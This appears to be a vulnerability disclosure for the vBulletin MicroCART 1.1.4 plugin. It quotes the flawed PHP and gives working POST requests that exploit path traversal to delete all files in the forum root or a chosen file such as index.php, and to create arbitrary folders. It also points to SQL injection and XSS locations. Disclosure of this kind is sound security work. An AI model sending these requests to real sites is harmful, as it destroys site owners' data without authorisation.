vBulletin MicroCART 1.1.4 – Arbitrary File(s) Deletion, SQL Injection & XSS

Plugin: http://www.vbulletin.org/forum/showthread.php?t=256723
Version: 1.1.4 (latest)

This plugin is fairly old but still used by a lot of people and received its last update nearly 4 years ago.
It’s vulnerable to arbitrary file deletion and SQL injection.

Arbitrary Files Deletion
In /microcart/editor/assetmanager/ are a bunch of files which are probably used to manage files/folders for the administrator, unfortunately no authentication and checks were added to see if the user should have access to it and if the request doesn’t contain anything malicious.

The /microcart/editor/assetmanager/folderdel_.php file contains the following on top:

$sMsg = "";

if(isset($_POST["inpCurrFolder"]))
  {
  $sDestination = pathinfo($_POST["inpCurrFolder"]);

  //DELETE ALL FILES IF FOLDER NOT EMPTY
    $dir = $_POST["inpCurrFolder"];
    $handle = opendir($dir);
    while($file = readdir($handle)) if($file != "." && $file != "..") unlink($dir . "/" . $file);
    closedir($handle);

  if(rmdir($_POST["inpCurrFolder"])==0)
    $sMsg = "";
  else
    $sMsg = "document.write(getTxt('Folder deleted.'))";
  }

By simply sending a POST request to this file, we can delete every single file in specified folder.

POST to:	/microcart/editor/assetmanager/folderdel_.php
POST data:	inpCurrFolder: ../../../

This POST request will delete every single .php file in the root folder of vBulletin.

Arbitrary File Deletion
There’s another vulnerability which resides in the /microcart/editor/assetmanager/assetmanager.php file. It contains an upload function, which is safe, and a file deletion function, which is not safe. We can delete any file off the server by abusing this. So unlike the previous vulnerability I just wrote which deletes all files by sending a POST request with a folder value, this will only delete 1 file off the server.

Vulnerable code:

if(isset($_POST["inpFileToDelete"]))
  {
  $filename=pathinfo($_POST["inpFileToDelete"]);
  $filename=$filename['basename'];
  if($filename!="")
    unlink($currFolder . "/" . $filename);
  $sMsg = "";
  }

Exploited by sending the following request:

POST to:	/microcart/editor/assetmanager/assetmanager.php
POST data:	inpCurrFolder: ../../../
		inpFileToDelete: index.php		

This will delete the /index.php file of vBulletin, in the root.

Aribtrary Folder Creation
Besides the file deletion, there’s a file called /microcart/editor/assetmanager/foldernew.php which creates a 0755 chmodded folder on the server.
The file contains the following on top:

$sMsg = "";

if(isset($_POST["inpNewFolderName"]))
  {
  $sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];

  if(is_dir($sFolder)==1)
    {//folder already exist
    $sMsg = "document.write(getTxt('Folder already exists.'))";
    }
  else
    {
    //if(mkdir($sFolder))
    if(mkdir($sFolder,0755))
      $sMsg = "document.write(getTxt('Folder created.'))";
    else
      $sMsg = "document.write(getTxt('Invalid input.'))";
    }
  }

By sending the following POST request, we will create a folder with 0755 chmodded permission.

POST to:	/microcart/editor/assetmanager/foldernew.php
POST data:	inpNewFolderName: 	davewashere
		inpCurrFolder: 		../../..

This POST request will create the folder davewashere in the root of the vBulletin forum.

SQL Injection
MicroCART is also vulnerable to SQL injection at several locations although most of them are rather hard to abuse. I will not explain how to exploit it, but the vulnerability can be found at /cart.php line 833 to 881 and the function where you can add products to your shopping cart, at around line 1251 to 1328 where $_POST[‘fields’] is assigned to the configuration variable which is later used in a query.

Cross Site Scripting
When modifying your information at /cart.php?do=cpanel, you can inject anything you want into the fields.
Viewing reviews of products may be vulnerable as well when you leave out the wysiwyg POST key.

Leave a Reply

Your email address will not be published / Required fields are marked *